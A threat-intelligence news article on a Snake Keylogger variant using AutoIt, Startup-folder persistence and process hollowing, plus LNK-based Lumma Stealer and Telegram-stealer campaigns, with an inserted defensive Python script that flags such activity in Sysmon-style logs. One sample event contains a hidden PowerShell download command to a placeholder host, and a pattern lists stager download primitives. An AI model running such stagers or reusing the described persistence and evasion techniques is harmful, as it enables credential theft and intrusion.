New Snake Keylogger Variant Uses AutoIt Scripting to Evade Detection

Feb 19, 2025 | The Hacker News | Malware / Threat Intelligence

A new variant of the Snake Keylogger malware is being used to actively target Windows users located in China, Turkey, Indonesia, Taiwan, and Spain.

Over 280 million blocked infection attempts have been recorded worldwide since the start of the year, according to Fortinet FortiGuard Labs.

"Typically delivered through phishing emails containing malicious attachments or links, Snake Keylogger is designed to steal sensitive information from popular web browsers like Chrome, Edge, and Firefox by logging keystrokes, capturing credentials, and monitoring the clipboard," security researcher Kevin Su said.

Its other features allow it to exfiltrate the stolen data to an attacker-controlled server with the help of the Simple Mail Transfer Protocol (SMTP) and Telegram bots, giving the threat actors access to stolen credentials and other sensitive data.

The most notable aspect of the latest set of attacks is the use of AutoIt scripting to deliver and execute the main payload. In other words, the executable containing the malware is an AutoIt-compiled binary, which allows it to bypass traditional detection mechanisms.

The use of AutoIt produces dynamic behavior that mimics benign automation tools and complicates static analysis by encoding the payload into the compiled script, Su added.

Once launched, Snake Keylogger is designed to drop a copy of itself to a file named "ageless.exe" in the folder "%Local_AppData%\supergroup". It also drops a Visual Basic Script (VBS) file, likewise named "ageless", into the Windows Startup folder so that the malware is automatically launched every time the system reboots.

This persistence mechanism allows Snake Keylogger to retain access to the compromised system and resume its malicious activities even after the associated process is terminated.

The attack chain culminates with the injection of the main payload into a legitimate .NET process such as "regsvcs" using a technique known as process hollowing, "allowing the malware to hide its location within a trusted process and avoid detection."

Snake Keylogger is also known to record keystrokes and to use websites like checkip.dyndns[.]org to retrieve the victim's IP address and geolocation.

"To capture keystrokes, it leverages the SetWindowsHookEx API with the first parameter set to WH_KEYBOARD_LL (flag 13), a low-level keyboard hook that monitors keystrokes," Su said. "This method enables the malware to log sensitive data, such as banking credentials."

The development comes as CloudSEK revealed a campaign that is utilizing compromised infrastructure at educational institutions to distribute malicious LNK files disguised as PDF documents in order to ultimately deploy malware.

The activity, targeting industries like finance, healthcare, technology, and media, is a multi-stage attack sequence that results in the theft of passwords, browser data, and cryptocurrency wallets.

Security researcher Mayank Sahariya said that the campaign's main infection vector is the use of malicious LNK (shortcut) files that are designed to appear as legitimate PDF documents. The files are hosted on a WebDAV server, to which unsuspecting visitors are redirected after visiting websites.

For its part, the LNK file runs a PowerShell command to connect to a remote server and retrieve the next-stage malware, an obfuscated JavaScript file that contains another PowerShell script, which in turn downloads Lumma Stealer from the same server and executes it.
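The persistence and execution steps described above (an executable dropped under %Local_AppData%, a VBS launcher in the Startup folder, a .NET host such as regsvcs spawned by the dropped binary) and the LNK-to-PowerShell download chain in the CloudSEK campaign all leave process- and file-creation traces that endpoint telemetry records. The following triage script is an added example, not code from Fortinet, CloudSEK or The Hacker News; it runs a handful of detection rules over constructed Sysmon-style event lines (EventID 11 = file created, EventID 1 = process created; the key=value layout only approximates real Sysmon fields). The file name "ageless.vbs", the user name, and the URL are assumptions, since the page truncates the script's name and gives no server.

```python
"""Triage of Sysmon-style events for the persistence and execution patterns
described in the article. Added example; event lines are constructed."""
import ntpath
import re

# Constructed sample events. "ageless.exe" and "%Local_AppData%\supergroup"
# follow the article; "ageless.vbs", the user "alice" and the URL are assumed.
SAMPLE_EVENTS = [
    r'EventID=11 Image=C:\Users\alice\AppData\Local\Temp\invoice.exe TargetFilename=C:\Users\alice\AppData\Local\supergroup\ageless.exe',
    r'EventID=11 Image=C:\Users\alice\AppData\Local\Temp\invoice.exe TargetFilename=C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs',
    r'EventID=1 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe ParentImage=C:\Users\alice\AppData\Local\supergroup\ageless.exe CommandLine=regsvcs.exe',
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine=powershell -w hidden -c "iwr http://placeholder.invalid/s.js"',
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine=powershell -c Get-Date',
]

# Key=Value fields; a value runs until the next " Key=" token or end of line.
# Simplification: a literal "word=" inside a value (e.g. a URL query) would split it.
FIELD_RE = re.compile(r'(\w+)=(.*?)(?=\s+\w+=|$)')

STARTUP_RE = re.compile(r'\\start menu\\programs\\startup\\', re.I)
LOCAL_APPDATA_RE = re.compile(r'\\appdata\\local\\', re.I)
USER_PROFILE_RE = re.compile(r'\\users\\[^\\]+\\', re.I)
# Download primitives commonly seen in one-line PowerShell stagers.
DOWNLOAD_RE = re.compile(r'iwr|invoke-webrequest|downloadstring|downloadfile|webclient|start-bitstransfer', re.I)
# .NET host binaries that make plausible hollowing targets; the article names regsvcs.
HOLLOWING_HOSTS = {'regsvcs.exe'}


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value Key=Value ...' event line into a dict."""
    return {key: value for key, value in FIELD_RE.findall(line)}


def classify(ev: dict) -> list:
    """Return the names of every rule the event matches (empty list = benign)."""
    hits = []
    if ev.get('EventID') == '11':
        target = ev.get('TargetFilename', '')
        # A VBS launcher written to the per-user Startup folder (reboot persistence).
        if target.lower().endswith('.vbs') and STARTUP_RE.search(target):
            hits.append('startup_vbs_drop')
        # A process running from a user profile writes an .exe under AppData\Local.
        if (target.lower().endswith('.exe') and LOCAL_APPDATA_RE.search(target)
                and USER_PROFILE_RE.search(ev.get('Image', ''))):
            hits.append('localappdata_exe_drop')
    elif ev.get('EventID') == '1':
        image = ntpath.basename(ev.get('Image', '')).lower()
        parent = ev.get('ParentImage', '')
        cmdline = ev.get('CommandLine', '')
        # A signed .NET host started by a binary in a user-writable path is the
        # parent/child shape process hollowing produces.
        if image in HOLLOWING_HOSTS and USER_PROFILE_RE.search(parent):
            hits.append('dotnet_host_from_user_path')
        # Double-clicking an LNK makes explorer.exe the parent of the PowerShell
        # stager; only flag it when the command line actually downloads something.
        if (image == 'powershell.exe' and ntpath.basename(parent).lower() == 'explorer.exe'
                and DOWNLOAD_RE.search(cmdline)):
            hits.append('explorer_powershell_download')
    return hits


def triage(lines) -> list:
    """Run every rule over every line; return (rule, Image) pairs in input order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for rule in classify(ev):
            findings.append((rule, ev.get('Image', '')))
    return findings


if __name__ == '__main__':
    for rule, image in triage(SAMPLE_EVENTS):
        print(f'{rule:30} {image}')
```

The last sample event (PowerShell launched from Explorer without a download primitive) is there to show the rule's false-positive guard: parent/child shape alone is too noisy, so the command line has to contribute evidence as well. Any one rule firing is weak on its own; the same host producing the drop, the Startup-folder script and the regsvcs launch within a short window is what a hunting query should correlate on.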

In recent weeks, stealer malware has also been discovered that harvests a variety of sensitive data from compromised Windows systems and sends it to a Telegram bot run by the attacker.

According to Cyfirma, the attack begins with an obfuscated JavaScript file that retrieves encoded strings from an open-source service to execute a PowerShell script.

This script then downloads a JPG image and a text file from an IP address and a URL shortener, respectively, both of which embed malicious MZ DOS executables using steganographic techniques. Once executed, these payloads deploy the stealer malware.
